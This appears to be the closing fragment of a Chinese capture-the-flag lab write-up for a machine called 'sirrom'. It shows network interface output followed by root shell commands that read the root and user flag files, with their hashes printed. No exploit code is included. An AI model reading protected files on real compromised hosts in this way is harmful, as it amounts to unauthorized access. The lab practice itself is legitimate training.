2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:68:65:c7 brd ff:ff:ff:ff:ff:ff
inet 192.168.54.6/24 brd 192.168.54.255 scope global dynamic noprefixroute ens33
valid_lft 1536sec preferred_lft 1536sec
inet6 fe80::20c:29ff:fe68:65c7/64 scope link noprefixroute
valid_lft forever preferred_lft forever
获取flag
root@sirrom:/# cat /root/root.txt
8fc9376d961670ca10be270d52eda423
root@sirrom:/# cat /home/norris/user.txt
2c2836a138c0e7f7529aa0764a6414d0
3461
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
